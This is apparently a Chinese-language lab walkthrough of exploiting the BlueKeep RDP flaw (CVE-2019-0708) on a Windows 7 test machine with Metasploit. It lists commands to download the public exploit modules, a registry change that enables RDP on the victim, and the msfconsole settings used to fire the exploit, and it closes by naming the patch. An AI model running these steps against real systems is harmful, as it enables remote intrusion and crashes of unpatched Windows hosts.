CVE-2019-0708远程桌面服务远程执行代码漏洞
上边这洞是啥我就不多说了,描述类的自行百度。
受影响系统版本范围:
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003(已停止维护)
Windows 7
Windows XP(已停止维护)
听说前两天有个exp:
我借来玩了一下,大概玩法是这样的:
要有个环境,我用的win7sp1
kali上我对我的整体环境进行了相关更新,以便更好匹配环境
gedit sources.list
apt-get update
apt-get install metasploit-framework
gedit sources.list
apt-get update && apt-get upgrade && apt-get dist-upgrade
apt-get install metasploit-framework
apt automove
apt autoremove
版本:
我先看看我msf安装的路径在哪里。
find / -name 'metasploit'
找到/usr/share/下
然后这堆东西进行下载
首先,我们需要下载好攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
放在/usr/share/metasploit-framework/lib/msf/core/exploit/ 记住要替换
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
放在/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
放在/usr/share/metasploit-framework/modules/exploits/rdp,如果这里没有rdp目录,就用mkdir命令创建一个rdp目录
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
放在/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp,如果这里没有rdp目录,就用mkdir命令创建一个rdp目录
使用msfupdate、reload_all更新重载一下msf。
就能找到刚才的文件了:
要有3389
关闭防火墙:
哦对了,受害者机器还要刚好有一行注册表:
@echo offcolor 1c sc config MpsSvc start= auto sc start MpsSvc reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
攻击机ip:192.168.10.152 受害者ip:192.168.10.154
玩起我们的exp
use exploit/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.10.154
set target 3 (可以使用show targets看一下,选适合自己环境的)
set forceexploit true
run
蓝了,多试几次,有点不稳定
嗯嗯嗯,有点不稳定,有点难用,不过还是有成功的时候,可以再等等新版本,没更好用的之前先凑合用吧。
防御:
不多说,KB4495667